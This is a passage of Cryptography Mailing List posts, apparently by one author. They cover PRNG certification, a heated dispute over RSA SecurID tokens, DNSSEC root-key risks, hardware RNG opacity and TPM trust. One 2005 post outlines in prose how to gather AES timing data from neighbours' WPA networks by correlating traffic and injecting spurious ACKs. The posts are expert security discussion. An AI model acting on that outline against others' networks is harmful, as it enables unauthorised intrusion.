In fact, I was in the middle of a FIPS-140 certification at level 2
a number of years ago when the Known Answer Test for the X9.17 block
cipher based PRNG was introduced.  One unanticipated side effect of
this test was to make it impossible to actually use a clock or free
running counter as the counter in the PRNG, since the KAT expected
the simplistic increment counter by 1 every time a block is extracted
behavior chosen by most implementers.

Of course, that mode is _less_ secure (because the internal state is
more predictable) than the other, but given the choice between validate
PRNG using special mode, run it using normal mode or validate PRNG
using special mode, run it using special mode I know I'd pretty much
always take the latter.  In fact, the test lab we were using told us
they were quite skeptical about the former as well.

Fortunately, the requirement for the PRNG KAT was delayed long enough
to let us get our code out the door without having to actually choose
either of the unpalatble ways.  But it does highlight a certain tension
in the process: they want to know that algorithms have predictable
(correct) results, but RNGs are supposed to have unpredicatable (correct)
results.  So any PRNG that is testable as part of the certification
process pretty much _has to_ have two modes, and bugs like this may
be more likely to occur in normal operation.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: debunking snake oil

2007-09-04 Thread Thor Lancelot Simon
On Mon, Sep 03, 2007 at 04:27:22PM -0400, Vin McLellan wrote:
 Thor Lancelot quoted that, and erupted with sanctimonious umbrage:
 
 I think it's important that we know, when flaws in commercial
 cryptographic products are being discussed, what the interests of the
 parties to the discussion are.  So, I'll ask again, as I did last time:
 when you post here, both in this instance and in past instances, is it
 at your own behest, or that of RSA?
 
 This is puerile.  One moderator is not enough? Now you want to set 
 yourself up as the Inquisition to vet for ideological purity?  No one 
 at RSA (or EMC, now RSA's parent firm) even knows about this 
 discussion, you ninny. Who would care?

[And a couple of hundred more lines -- but no actual direct answer to
 the question!]

I'll try again: yes, you've identified yourself as a consultant to RSA.
When you have posted here, both in this most recent thread and in other
threads, in particular the SecurID 800 thread, has it been at your own
behest, or that of RSA?

In other words, when you post here defending RSA products against
criticism, often with very emphatic language and in a way that belittles
the person making the criticism rather than engaging with the actual
technical critique, can we assume that it is not the case that RSA
asked you to do so?  Or is it, in fact, sometimes the case that RSA
asks you to post about their products here, and thus we should read your
words as being RSA's words?

I don't think it's an unreasonable question, and I ask it one more time
because, despite all the vitriol you directed at me (including the rather
odd choice to refer to me by my middle name rather than in a more normal
way) you did not, in fact, answer it.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: debunking snake oil

2007-09-02 Thread Thor Lancelot Simon
On Sun, Sep 02, 2007 at 06:26:33PM -0400, Vin McLellan wrote:
 At 12:40 PM 9/2/2007, Paul Walker wrote:
 
 I didn't realise the current SecurID tokens had been broken. A quick Google
 doesn't show anything, but I'm probably using the wrong terms. Do you have
 references for this that I could have a look at?
 
 I'd also be interested in any evidence that the SecurID has been cracked.
 
 Any credible report would have the immediate attention of tens of 
 thousands of RSA installations. Not to speak of EMC/RSA. itself, for 
 which I have been a consultant for many years.

That's right, you have.  As I recall, the last time you posted here was
when you tried to defend RSA's decision to sell no-human-interaction
tokens.  At that time, I asked you whether you were posting for yourself
or whether someone at RSA had asked you to post here, and you declined
to respond.

I think it's important that we know, when flaws in commercial
cryptographic products are being discussed, what the interests of the
parties to the discussion are.  So, I'll ask again, as I did last time:
when you post here, both in this instance and in past instances, is it
at your own behest, or that of RSA?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Skype new IT protection measure

2007-08-20 Thread Thor Lancelot Simon
On Mon, Aug 20, 2007 at 11:42:39AM -0400, Peter Thermos wrote:
 
 We can confirm categorically that no malicious activities were attributed
 or that our users' security was not, at any point, at risk.

One wonders if it was their attorneys who suggested that they confirm
categorically that x OR y -- never mind that no malicious activities
being attributed (by whom? to whom? attribute takes a subject and an
object, and neither is optional!  note the passive voice!) doesn't mean,
of course, that none occurred, nor than none were discovered by others
or even by Skype itself.

Reads like classic corporate weasel-wording to me.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: The bank fraud blame game

2007-07-02 Thread Thor Lancelot Simon
On Sun, Jul 01, 2007 at 08:38:12AM -0400, Perry E. Metzger wrote:
 
 [EMAIL PROTECTED] (Peter Gutmann) writes:
  (The usage model is that you do the UI portion on the PC, but
  perform the actual transaction on the external device, which has a
  two-line LCD display for source and destination of transaction,
  amount, and purpose of the transaction.  All communications enter
  and leave the device encrypted, with the PC acting only as a proxy.
  Bill of materials shouldn't be more than about $20).
 
 I've been thinking this was the way to go for years now.

Who hasn't?  Oh, I'm sorry -- I meant to say: who, outside of the
set of producers and consumers of security snake oil aimed at
financial institutions, hasn't?

Regular readers will recall the SecurID discussion of about a
year ago, when an individual who appeared to be a paid consultant
to RSA vigorously put forth the notion that secure devices which
required the user to actually do something to authenticate a
transaction were _not_ what was needed -- to the shock and awe
of most readers of, and writers to, the thread here, at least
as I would summarize the discussion.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: 307 digit number factored

2007-06-09 Thread Thor Lancelot Simon
On Thu, May 24, 2007 at 01:01:03PM -0400, Perry E. Metzger wrote:
 
 Even for https, it costs no more to type in 2048 than 1024 into
 your cert generation app the next time a cert expires. The only
 potential cost is if you're so close to the performance line that
 slower RSA ops will cause you pain -- otherwise, it is pretty much
 costless. For average people's web servers most of the time,
 connections are sufficiently infrequent and RSA operations are fast
 enough that it makes no observable difference.

I don't buy it.  I build HTTP load balancers for a living, and for
basically all of our customers who use our HTTPS accelleration at all,
the cost of 1024-bit RSA is already, by a hefty margin, with hardware
assist, the limiting factor for performance.  Look at the specs on
some of the common accelelrator families sometime: 2048 bit is going to
be quite a bit worse.

Busy web sites that rely on HTTPS are going to pay a fairly heavy price
for using longer keys, and not just in cycles: the few hardware solutions
still on the market that can stash keys in secure storage, of course, can
stash exactly half as many 2048-bit keys as 1024-bit ones.  Users who care
about HTTPS performance aren't as rare, I think, as you think.

What's more frustrating is the slow rate at which accellerator vendors
have moved ECC products towards market.  That's not going to help with
adoption any.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: DNSSEC to be strangled at birth.

2007-04-06 Thread Thor Lancelot Simon
On Thu, Apr 05, 2007 at 07:32:09AM -0700, Paul Hoffman wrote:
 
 Control: The root signing key only controls the contents of the root, 
 not any level below the root.

That is, of course, false, and presumably is _exactly_ why DHS wants
the root signing key: because, with it, one can sign the appropriate
chain of keys to forge records for any zone one likes.

Plus, now that applications are keeping public keys for services in
the DNS, one can, in fact, forge those entries and thus conduct man in
the middle surveillance on anyone dumb enough to use DNS alone as a
trust conveyor for those protocols (e.g. SSH and quite possibly soon
HTTPS).

I know you understand this stuff well enough to know these risks exist.
I'm curious why you'd minimize them.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: DNSSEC to be strangled at birth.

2007-04-06 Thread Thor Lancelot Simon
On Thu, Apr 05, 2007 at 04:49:33PM -0700, Paul Hoffman wrote:
 
 because, with it, one can sign the appropriate
 chain of keys to forge records for any zone one likes.
 
 If the owner of any key signs below their level, it is immediately 
 visible to anyone doing active checking. The root signing furble.net 
 instead of .net signing furble.net is a complete giveaway to a 
 violation of the hierarchy and an invitation for everyone to call 
 bullshit on the signer. Doing so would completely negate the value of 
 owning the root-signing key.

You're missing the point.  The root just signs itself a new .net key,
and then uses that to sign a new furble.net key, and so forth.  No
unusual key use is required.

It's a hierarchy of trust: if you have the top, you have it all, and
you can forge anything you like, including the keys used to sign the
application key records used to encrypt user data, where they are
present in the system.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: DNSSEC to be strangled at birth.

2007-04-06 Thread Thor Lancelot Simon
On Thu, Apr 05, 2007 at 05:30:53PM -0700, Paul Hoffman wrote:
 At 7:54 PM -0400 4/5/07, Thor Lancelot Simon wrote:
 
 You're missing the point.  The root just signs itself a new .net key,
 and then uses that to sign a new furble.net key, and so forth.  No
 unusual key use is required.
 
 And you seem to be missing my point. If the root signs itself a new 
 .net key, it will be completely visible to the entire community using 
 DNSSEC. The benefit of doing so in order to forge the key for 
 furble.net (or microsoft.com) will be short-lived, as will the 
 benefit of owning the root key.

You assume the new .net key (and what's signed with it) would be
supplied to all users of the DNS, rather than used for a targeted
attack on one user (or a small number of users).  Why assume the
potential adversary will restrict himself to the dumbest possible
way to use the new tools you're about to hand him?

Do you really think that the administrator of the _average_ DNS
client would notice that a new key for .net showed up?  It's trivial
to inject forged UDP packets, after all, so it is hardly the case
that one has to give the new forged key chain to every DNS server 
along the way in order to run a nasty MITM attack on a client.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: OT: SSL certificate chain problems

2007-01-30 Thread Thor Lancelot Simon
On Fri, Jan 26, 2007 at 11:42:58AM -0500, Victor Duchovni wrote:
 On Fri, Jan 26, 2007 at 07:06:00PM +1300, Peter Gutmann wrote:
 
  In some cases it may be useful to send the entire chain, one such being 
  when a
  CA re-issues its root with a new expiry date, as Verisign did when its roots
  expired in December 1999.  The old root can be used to verify the new root.
 
 Wouldn't the old root also (until it actually expires) verify any
 certificates signed by the new root? If so, why does a server need to
 send the new root? So long as the recipient has either the new or the
 old root, the chain will be valid.

That doesn't make sense to me -- the end-of-chain (server or client)
certificate won't be signed by _both_ the old and new root, I wouldn't
think (does x.509 even make this possible)?

That means that for a party trying to validate a certificate signed by
the new root, but who has only the old root, the new root's certificate
will be a necessary intermediate step in the chain to the old root, which
that party trusts (assuming the new root is signed by the old root, that
is).

Or do I misunderstand?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: How important is FIPS 140-2 Level 1 cert?

2006-12-27 Thread Thor Lancelot Simon
On Tue, Dec 26, 2006 at 05:36:42PM +1300, Peter Gutmann wrote:
 
 In addition I've heard of evaluations where the generator is required to use a
 monotonically increasing counter (clock value) as the seed, so you can't just
 use the PRNG as a postprocessor for an entropy polling mechanism.  Then again
 I know of some that have used it as exactly that without any problems.

This (braindamaged) requirements change was brought in by the creation of
a Known Answer Test for the cipher-based RNG.  Prior to the addition of
that test, one could add additional entropy by changing the seed value at
each iteration of the generator.  But that makes it, of course, impossible
to get Known Answers that confirm that the generator actually imlements
the standard.  So suddenly the alternate form of the generator -- in my
opinion much less secure -- which uses a monotonically-increasing counter
for the seed, was the only permitted form.

I have yet to hear of anyone who has found a test lab that will certify
a generator implementation that uses the mono counter for the KAT suite
but a random seed in normal operation.  For good reason, labs are usually
very leery of algorithm implementations that come with a special test
mode.

However, you are free to change the actual key for the generator as often
as you like.  I'm not sure why OpenSSL doesn't implement fork protection
that way, for example -- or does it use the MAC-based generator instead?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: cellphones as room bugs

2006-12-03 Thread Thor Lancelot Simon
On Sat, Dec 02, 2006 at 05:15:02PM -0500, John Ioannidis wrote:
 On Sat, Dec 02, 2006 at 10:21:57AM -0500, Perry E. Metzger wrote:
  
  Quoting:
  
 The FBI appears to have begun using a novel form of electronic
 surveillance in criminal investigations: remotely activating a
 mobile phone's microphone and using it to eavesdrop on nearby
 conversations.
 
 Not very novel; ISDN phones, all sorts of digital-PBX phones, and now
 VoIP phones, have this feature (in the sense that, since there is no
 physical on-hook switch (except for the phones in Sandia and other
 such places), it's the PBX that controls whether the mike goes on or
 not).

It's been a while since I built ISDN equipment but I do not think this
is correct: can you show me how, exactly, one uses Q.931 to instruct the
other endpoint to go off-hook?

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: TPM disk crypto

2006-10-08 Thread Thor Lancelot Simon
On Thu, Oct 05, 2006 at 11:51:49PM +0200, Erik Tews wrote:
 Am Donnerstag, den 05.10.2006, 16:25 -0500 schrieb Travis H.:
  On 10/2/06, Erik Tews [EMAIL PROTECTED] wrote:
   Am Sonntag, den 01.10.2006, 23:42 -0500 schrieb Travis H.:
Anyone have any information on how to develop TPM software?
http://tpm4java.datenzone.de/
   Using this lib, you need less than 10 lines of java-code for doing some
   simple tpm operations.
  
  Interesting, but not what I meant.  I want to program the chip to verify
  that the BIOS, boot sector, root partition conform to *my* specification.
  
 You can do that (at least in theory).
 
 First, you need a system with tpm. I assume you are running linux. Then
 you boot your linux-kernel and an initrd using the trusted grub
 bootloader. Your bios will report the checksum of trusted grub to the
 tpm before giving control to your grub bootloader.

And the TPM knows that your BIOS has not lied about the checksum of grub
how?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: RSA SecurID SID800 Token vulnerable by design

2006-09-14 Thread Thor Lancelot Simon
On Wed, Sep 13, 2006 at 10:23:53PM -0400, Vin McLellan wrote:
 
[... a long message including much of what I can only regard as
 outright advertising for RSA, irrelevant to the actual technical
 weakness in the SID800 USB token that Hadmut described, and which
 Vin's message purportedly disputes.  It would be nice if, when confronted
 with such a response in the future, the moderator of this list would
 return it to its author with the requirement that the marketeering be
 stripped out before the actual content be forwarded to this list!  I
 have snipped everything irrelevant to my own response. ... ]

 None of these features -- none of the SID800's cryptographic 
 resources -- were of apparent interest to Mr. Danisch. He ignored 
 them all when he denounced the SID800 as vulnerable by design.

As well he should have, because they are utterly irrelevant to the
genuine design flaw which he pointed out, and which Vin seeks to
minimize (by burying it in irelevancies?) here.

 What particularly disturbs Mr. D is one option among in the SID800 
 SecurID features which allows RSA's local client software to poll and 
 retrieve a single OTP from the token when the SID800 is plugged into 
 the PC's USB port.  Given the potential for malicious malware to 
 invade and take control of any Windows PC -- malware that can seize 
 and misuse both the user's PIN and an OTP fresh from the USB bus -- 
 it was irresponsible, Danisch suggests, for RSA to make such a option 
 available to its customers.

And so it was.  Vin simply handwaves away the fact that if RSA's client
software can poll the token and retrieve the current OTP, so can any
malicious software running on the host to which the token is attached.

It is not correct to suggest that perhaps this could be done only once,
when the token were first plugged in to the host system's USB port,
because USB *by design* allows the host to cut and restore power to
devices under software control, so that the SID800 can, even if it
somehow is intended to only allow token retrieval once upon plug-in
and once only (something Vin seems to imply, but does not directly
state) simply be repeatedly tricked into thinking that it has just been
plugged in.

 In the second version of the SID800 -- an option selectable by local 
 management pre-purchase, and burnt into the token's USB firmware by 
 RSA -- the user can select a menu in which he instructs the SecurID 
 to load one OTP token-code directly into the paste buffer, presumably 
 for immediate use. Since internal access to the SecurID's OTP via the 
 USB bus makes it a potential target for malware or intruders on the 
 computer, claimed Mr. Danisch, This is weak by design.  I beg to 
 differ. Effective IT security is about an appropriate balance, not 
 walls of iron or stone.

Good cooking is about full-bodied flavor, not wire rope or persian
kittens; but let's leave the irrelevant analogy aside and stick to the
facts that seem to be discussed here, I suppose.

Vin claims that the user instructs the SecureID to load one OTP
token-code directly into the paste buffer.  This is a very, very odd
claim, because it implies that the user communicates directly with a
USB peripheral and instructs _the peripheral_ to autonomously load
a token-code -- some bytes -- into an area in host memory that is used
by the host operating system's user interface.  We should note that,
unlike Firewire, USB *does not include a mechanism by which a
peripheral on the bus may initiate a DMA transfer into the memory of
the host system that is the master of the bus* so clearly what Vin
claims cannot be strictly true.  What, then, should we think that it
likely means?  I think he must mean something like this:

  The user instructs the RSA-supplied application code running on the
   host system to retrieve one token code from the SecureID across the
   USB bus, and place that retrieved token code into the paste buffer.

If that is not what Vin means, I think that he should respond and say
exactly what he does mean, in a way that does not make reference to
mythical properties that USB peripherals do not have.

Now, consider what it means that it is even _possible_ for the RSA-
supplied application to retrieve a token code from the SID800 in this
way.  It means that by, at worst, cutting and restoring power to the
USB port in question, malicious software can retrieve *a new, current
token code* *any time it wants to do so*.  In other words, while, with
traditional SecureID tokens, it is possible for malicious software to
steal token codes typed by the user into a compromised host system _when
the user types them_, and by engaging in a man-in-the-middle scheme
impersonate the intended target system to the user _that once_ (since
SecureID token codes can not be used twice), this new system does, in
fact, open up the gaping new security hole Hamisch claims it does:

   With this USB-connected token, malicious software on the host can poll
   the token and retrieve 

Re: Exponent 3 damage spreads...

2006-09-13 Thread Thor Lancelot Simon
On Mon, Sep 11, 2006 at 06:18:06AM +1000, James A. Donald wrote:
 
 3.  No one actually uses DNSSEC in the wild.

DNSSEC seems to be not-uncommonly used to secure dynamic updates,
which is not the most common DNS feature in the world but it is not
so uncommon either.


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL Cert Prices Notes

2006-08-10 Thread Thor Lancelot Simon
On Mon, Aug 07, 2006 at 05:12:45PM -0700, John Gilmore wrote:
 
 The good news is that CAcert seems to be posistioned for prime time debut, 
 and you can't beat *Free*. :-)

You certainly can, if slipshod practices end up _costing_
you money.

Has CAcert stopped writing certificates with no DN yet?

Has CAcert stopped writing essentially unverifiable (or,
if you prefer to think of it that way, forensics-hostile)
CN-only certificates on the basis of a single email exchange
yet?

Has CAcert stopped using MD5 in all their signatures yet?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Crypto to defend chip IP: snake oil or good idea?

2006-07-29 Thread Thor Lancelot Simon
On Thu, Jul 27, 2006 at 08:53:26PM -0600, Anne  Lynn Wheeler wrote:
 
 If you treat it as a real security chip (the kind that goes into 
 smartcards and hardware token) ... it eliminates the significant 
 post-fab security handling (prior to finished delivery), in part to 
 assure that counterfeit / copy chips haven't been introduced into the 
 stream  with no increase in vulnerability and threat.

I don't get it.  How is there no increase in vulnerability and threat
if a manufacturer of counterfeit / copy chips can simply read the already
generated private key out of a legitimate chip (because it's not protected
by a tamperproof module, and the significant post-fab security handling
has been eliminated) and make as many chips with that private key as he
may care to?

Why should I believe it's any harder to steal the private key than to
steal a static serial number?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Crypto to defend chip IP: snake oil or good idea?

2006-07-29 Thread Thor Lancelot Simon
On Fri, Jul 28, 2006 at 03:52:55PM -0600, Anne  Lynn Wheeler wrote:
 Thor Lancelot Simon wrote:
 I don't get it.  How is there no increase in vulnerability and threat
 if a manufacturer of counterfeit / copy chips can simply read the already
 generated private key out of a legitimate chip (because it's not protected
 by a tamperproof module, and the significant post-fab security handling
 has been eliminated) and make as many chips with that private key as he
 may care to?
 
 Why should I believe it's any harder to steal the private key than to
 steal a static serial number?
 
 so for more drift ... given another example of issues with static
 data authentication operations is that static serial numbers are 
 normally considered particularly secret ... and partially as a result 
 ... they tend to have a fairly regular pattern ... frequently even 
 sequential. there is high probability that having captured a single 
 static serial number ... you could possibly correctly guess another 
 million or so static serial numbers w/o a lot of additional effort. This 
 enables the possibly trivial initial effort to capture the first serial 
 number to be further amortized over an additional million static serial 
 numbers ... in effect, in the same effort it has taken to steal a single 
 static serial number ... a million static serial numbers have 
 effectively been stolen.

The simple, cost-effective solution, then, would seem to be to generate
static serial numbers like cipher keys -- with sufficient randomness
and length that their sequence cannot be predicted.  I still do not see
the advantage (except to Certicom, who would doubtless like to charge a
bunch of money for their 20-40k gate crypto code) of using asymmetric
cryptography in this application.


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Crypto to defend chip IP: snake oil or good idea?

2006-07-27 Thread Thor Lancelot Simon
On Tue, Jul 25, 2006 at 03:49:11PM -0600, Anne  Lynn Wheeler wrote:
 Perry E. Metzger wrote:
 EE Times is carrying the following story:
 
 http://www.eetimes.com/news/latest/showArticle.jhtml?articleID=190900759
 
 It is about attempts to use cryptography to protect chip designs from
 untrustworthy fabrication facilities, including a technology from
 Certicom.
 

 http://www.garlic.com/~lynn/x959.html#aads
 
 which basically puts keygen and minimal number of other circuits in the 
 chip. keygen is executed as part of standard initial power-on/test ... 
 before the chips are sliced and diced from the wafer.

So, you sign the public key the chip generated, and inject the _signed_
key back into the chip, then package and ship it.  This is how the SDK
for IBM's crypto processors determines that it is talking to the genuine
IBM product.  It is a good idea, and it also leaves the chip set up for
you with a preloaded master secret (its private key) for encrypting other
keys for reuse in insecure environments, which is really handy.

But do we really think that general-purpose CPUs or DSPs are going to
be packaged in the kind of enclosure IBM uses to protect the private keys
inside its cryptographic modules?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Use of TPM chip for RNG?

2006-07-04 Thread Thor Lancelot Simon
On Mon, Jul 03, 2006 at 10:41:05AM -0600, Anne  Lynn Wheeler wrote:
 
 however, at least some of the TPM chips have RNGs that have some level 
 of certification (although you might have to do some investigation to 
 find out what specific chip is being used for TPM).

See one of the examples in my other message today in this thread (subject
changed as an aid to new readers) for an example of why you should *not*
trust such certifications as evidence that the RNG is any good.

Summary: I have encountered one such RNG that was FIPS-140 certified as
a Deterministic RNG but whose hardware inputs the vendor refused to
disclose, which I find extremely suspicious.  It is possible to get a
DRNG certified without careful analysis of what its input is; I have
personally seen this happen and heard of more instances even after NIST
gave specific guidance to the contrary.

-- 
  Thor Lancelot Simon[EMAIL PROTECTED]

  We cannot usually in social life pursue a single value or a single moral
   aim, untroubled by the need to compromise with others.  - H.L.A. Hart

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Dirty Secrets of noise based RNGs

2006-07-04 Thread Thor Lancelot Simon
On Mon, Jul 03, 2006 at 02:31:10PM +1200, Peter Gutmann wrote:
 
 So the only hardware RNG I'd trust is one of the noise-based ones on full-
 scale crypto processors like the Broadcom or HiFn devices, or the Via x86's.
 There are some smart-card vendors who've tried to replicate this type of
 generator in a card form-factor device, but from what little technical info is
 available about generators on smart cards it seems to be mostly smoke and
 mirrors.

Do you actually know of publically available documentation on the design
and implementation of *any* of these noise based RNGs?  I have spent
some time looking, and I do not.

Here is what I do know:

1) There's one exception: Hifn documents the RNG used on their 65xx and
   can, upon request, provide documentation on exactly how the version
   on the common 79xx chips differs from this design.  They also provide
   a fairly good analysis (practical and theoretical) of the design's
   strength.

BUT

2) Hifn used to make this documentation publically available but access
   to it now requires permission from Hifn sales -- it has been password
   protected on their public web site.  In other words, after years of
   design wins based on little but open-source friendliness (after all,
   Hifn's chips are no faster, often slower, than others', and notoriously
   buggy) they are now, at least on this issue, biting the hand that feeds
   them.

3) Broadcom makes no RNG documentation, much less analysis, publically
   available.  If you're using their RNG without NDA documentation that
   may or may not even exist, it's on a trust us...really! basis.

4) Neither does any other crypto vendor for whose products open-source
   drivers are available, AFAICT.

5) Some general-purpose CPU and motherboard chipset vendors include RNGs
   in their product.  Intel used to do so, and had a very good analysis
   of their product available.  But then they muddied the water by making
   it impossible to tell which chips had real RNGs on them and which just
   had junk registers sampling who knows what -- probably bus noise in
   some cases.  And they now call the RNG product end of life.

   AMD has an RNG on their host chipset for Opteron, as they did on their
   last server chipset for Athlon MP.  But they do not document how it
   works nor provide any analysis of its strength.

   I have not had time to investigate the situation vis-a-vis VIA.  I am
   told it's somewhat better, but I was told the Broadcom stuff was
   trustworthy, too, and then I found out that the person who said so did
   not really have documentation either!

6) I have run into one implementation of an RNG on a crypto processor
   from a major vendor that is actually clearly, once one reads between
   the lines of its documentation, an X9.31 Deterministic RNG using the
   symmetric crypto functionality of the chip.  The vendor's documentation
   is silent as to what the actual entropy source is, and they *did not
   respond to a direct inquiry* on the subject.  This product is FIPS-140
   certified; but it was clearly designed *only* to pass certification,
   and for obvious reasons, you should not trust it!

   A good FIPS-140 test lab should follow the guidance from NIST that the
   input source to the D. RNG must not contain less entropy than the
   output.  But it is possible to sneak almost anything past a test lab
   if you're crafty about it and this vendor's refusal to disclose to a
   high-volume customer where the input bits come from is really scary.

These all add up to vendors are doing things with their 'noise-based'
RNGs that should *really* scare you.  If you are specifying such a RNG
for deployment, and you have any leverage over the vendor who makes it,
I strongly urge you to make disclosure of how it works, including any
analysis they've done, a condition of your use of their product.  The
Intel and Hifn white papers are good examples of what *every* vendor
should be willing to publically disclose, if their RNG design does not
give them something to hide.

-- 
  Thor Lancelot Simon[EMAIL PROTECTED]

  We cannot usually in social life pursue a single value or a single moral
   aim, untroubled by the need to compromise with others.  - H.L.A. Hart

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Crypto hardware with secure key storage

2006-05-19 Thread Thor Lancelot Simon
I'm trying to investigate which of the current high-end PCI crypto
accellerators include secure storage of key material -- that is, the
use model where one loads, say, an RSA private key or key for a symmetric
cipher into the device one, receives a reference, and can later, even
after device power down, tell the card use key with reference X for this
operation.

I realize that there are ways to do this without actual persistent storage
on the card, e.g. encryption of the key with a symmetric cipher using a
secret key stored in the card, which allows the cleartext key to be disposed
of so long as the card can be told okay, decrypt and use this key in the
future.  That's fine, too.

I've run into some vendors who claim to support secure key storage
but turn out to mean something else by it.  I'm specifically looking
for a device that accellerates pubkey operations and is aimed at SSL.

If people with experience with particular hardware want to share that
with me in private rather than broadcasting it to the list, that's fine,
too; I'm just trying to select a device to meet an immediate need and
am okay with not shouting out a comparison of vendor capabilites to the
entire world (though I do think it is regrettable that there's a lack
of information on this kind of device capability anywhere public).

-- 
  Thor Lancelot Simon[EMAIL PROTECTED]

  We cannot usually in social life pursue a single value or a single moral
   aim, untroubled by the need to compromise with others.  - H.L.A. Hart

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: browser vendors and CAs agreeing on high-assurance certificates

2005-12-22 Thread Thor Lancelot Simon
On Sun, Dec 18, 2005 at 09:47:27AM -0800, James A. Donald wrote:
 
 Has anyone been attacked through a certificate that 
 would not have been issued under stricter security?  The 
 article does not mention any such attacks, nor have I
 ever heard of such an attack.

Ought we forget that two such certificates were issued to a party
(identity, AFAIK, still unknown) claiming to be Microsoft?  What,
exactly, do you think that party's plans for those certificates
were -- and why, exactly, do you think they were inocuous?

  Thor Lancelot Simon[EMAIL PROTECTED]

  We cannot usually in social life pursue a single value or a single moral
   aim, untroubled by the need to compromise with others.  - H.L.A. Hart

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: AES cache timing attack

2005-06-26 Thread Thor Lancelot Simon
On Tue, Jun 21, 2005 at 10:38:42PM -0400, Perry E. Metzger wrote:
 
 Jerrold Leichter [EMAIL PROTECTED] writes:
  Usage in first of these may be subject to Bernstein's attack.  It's much 
  harder to see how one could attack a session key in a properly implemented 
  system the same way.  You would have to inject a message into the ongoing 
  session.
 
 I gave an example yesterday. Perhaps you didn't see it.
 
 The new 802.11 wireless security protocols encrypt the on-air portion
 of communications, and are typically attached to ethernet bridges.

Sorry I didn't respond to this earlier -- I was on vacation last week.

It is simple to practice this attack against an 802.11 network that is
behind a NAT or routing firewall, rather than just a simple Ethernet
bridge.  It's only moderately harder when the 802.11 network is separated
from the public Internet by a proxy firewall.

In fact, I can run it right here in my house:

From the west-facing window of my apartment building, I can see over
50 different 802.11 networks as I scan the buildings across the street
with a reasonably tight antenna.  Many of those networks are connected
to the public Internet by a cablemodem network to which I also have
access.

A small number of those networks use WPA with AES (I'm lucky I have so
many networks to choose from; this isn't common on residentail networks --
yet).

So, to obtain encryption timing data, I can:

1) Do two quick tcpdumps, imported them into SPSS, and look for the
   best-correlated wireless and wired activity times.  This gives me a
   good guess as to which wireless network had which public address (it
   also, presumably, gives me en/deryption timing data, for known, even,
   but not chosen plaintext; but that's just gravy).

2) Look at the tcpdump for the wired segment again (or run a new one) to
   find some open TCP connections.  These will pretty much all correspond
   to open TCP connections on the inside; routing firewalls and almost
   all NAT boxes will just pass packets sent from the outside straight
   through (a proxy firewall will require an application-layer attack)

3) Send duplicate ACKs (or wholly spurious ACKs) to the public address
   of the firewall in question and watch the wireless segment to see
   how long it takes to encrypt them.  Oh, by the way, they're chosen
   plaintext...

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Is finding security holes a good idea?

2004-06-16 Thread Thor Lancelot Simon
On Tue, Jun 15, 2004 at 09:37:42PM -0700, Eric Rescorla wrote:
 Arnold G. Reinhold [EMAIL PROTECTED] writes:
  My other concern with the thesis that finding security holes is a bad
  idea is that it treats the Black Hats as a monolithic group. I would
  divide them into three categories: ego hackers, petty criminals, and
  high-threat attackers (terrorists, organized criminals and evil
  governments).  The high-threat attackers are  likely accumulating
  vulnerabilities for later use. With the spread of programming
  knowledge to places where labor is cheap, one can imagine very
  dangerous systematic efforts to find security holes.  In this context
  the mere ego hackers might be thought of as beta testers for IT
  security.  We'd better keep fixing the bugs.
 
 This only follows if there's a high degree of overlap between the
 bugs that the black hats find and the bugs that white hats would
 find in their auditing efforts. That's precisely what is at
 issue.

Indeed it is -- and unless I misunderstand, you're claiming that there
is _not_ such a degree of overlap.

I think most people would tend to agree that humans working in the same
field generally work in similar ways; some, of course, are innovative
and exceptional, but in general most run-of-the-mill system programmers
have a lot of the same tools in their mental toolboxes and use them in 
much the same way; and some of the time, even the innovative and
exceptional ones work in the same way as us drudges.

This, to me, makes your claim extremely counterintuitive and questionable;
it contradicts not only my intuition but my experience.  I can't even
begin to count the number of bugs I've found by inspection of code (with
some other purpose in mind), forgotten to tell coworkers about or to fix
right such that the fixes could be committed, and then seen others
discover when they happened to cast their eyes over the same code fragment
days, weeks, or months later.  And I have deliberately audited large
sections of code, prepared fixes, paused a couple of days or weeks to test
my results, and seen others deliberately or accidentally find and fix (or,
worse, exploit) the same bugs I'd laboriously churned up.

If you won't grant that humans experienced in a given field tend to think
in similar ways, fine.  We'll just have to agree to disagree; but I think
you'll have a hard time making your case to anyone who _does_ believe that,
which I think is most people.  If you do grant it, I think it behooves you
